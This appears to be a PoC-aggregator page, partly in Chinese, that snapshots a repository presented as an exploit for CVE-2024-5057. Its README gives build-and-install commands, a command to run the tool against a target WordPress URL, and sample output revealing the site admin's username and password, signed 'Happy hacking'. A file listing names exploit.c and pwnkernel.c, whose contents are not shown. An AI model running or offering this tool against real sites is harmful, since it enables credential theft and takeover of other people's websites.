关联漏洞
描述
poc-CVE-2024-5057
介绍
# About
CVE-2024-5057
Let's try to inject and get the creds.
```bash
cd cve-2024-5057
./configure
make
make install
```
The expoit is installed as `/usr/local/bin/cve-2024-5057`.
So
```bash
cve-2024-5057 https://wp.example.com
```
where `https://wp.example.com` is a target Wordpress site.
# Result output
If the site is not vulnerable:
```text
The site is not vulnerable
```
If the injection succeeded:
```text
username: Admin
password: Secret
```
returning username and password of the WP site admin.
--
**Happy hacking**
文件快照
[4.0K] /data/pocs/d32e01bb4efda14557ace6414203b2f6fd826ef8
├── [ 460] CMakeLists.txt
├── [1.2M] configure
├── [ 11K] exploit.c
├── [ 764] pwnkernel.c
└── [ 543] README.md
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。